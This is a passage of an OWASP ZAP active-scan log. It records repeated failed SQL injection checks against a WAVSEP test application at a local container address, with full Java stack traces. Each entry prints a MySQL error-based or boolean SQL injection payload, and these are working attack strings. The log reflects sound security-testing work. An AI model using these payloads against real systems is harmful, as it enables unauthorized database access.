org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682025 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (4073=3027) THEN 4073 ELSE 4073*(SELECT 4073 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CASE WHEN (4073=3027) THEN 4073 ELSE 4073*(SELECT 4073 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682026 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND (SELECT 1491 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1491=1491,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (5471=5471] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) AND (SELECT 1491 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1491=1491,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (5471=5471 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682027 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (6570=6570) THEN 6570 ELSE 6570*(SELECT 6570 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CASE WHEN (6570=6570) THEN 6570 ELSE 6570*(SELECT 6570 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682028 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND (SELECT 7697 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7697=7697,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND (SELECT 7697 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7697=7697,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682029 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (9429=5994) THEN 9429 ELSE 9429*(SELECT 9429 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CASE WHEN (9429=5994) THEN 9429 ELSE 9429*(SELECT 9429 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682030 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND (SELECT 7056 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7056=7056,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('dxWH'='dxWH] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') AND (SELECT 7056 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7056=7056,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('dxWH'='dxWH at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682031 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND (SELECT 9707 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9707=9707,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (7717=7717] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND (SELECT 9707 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9707=9707,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (7717=7717 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682031 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND (SELECT 4738 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4738=4738,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YlwM'='YlwM] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' AND (SELECT 4738 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4738=4738,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YlwM'='YlwM at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682032 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT 1637 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1637=1637,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT 1637 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1637=1637,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682032 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND (SELECT 3698 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(3698=3698,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' AND (SELECT 3698 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(3698=3698,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682034 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND (SELECT 7149 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7149=7149,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- BaKG] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND (SELECT 7149 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7149=7149,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- BaKG at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682034 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND (SELECT 2621 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2621=2621,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('lSGN'='lSGN] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND (SELECT 2621 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2621=2621,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('lSGN'='lSGN at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at 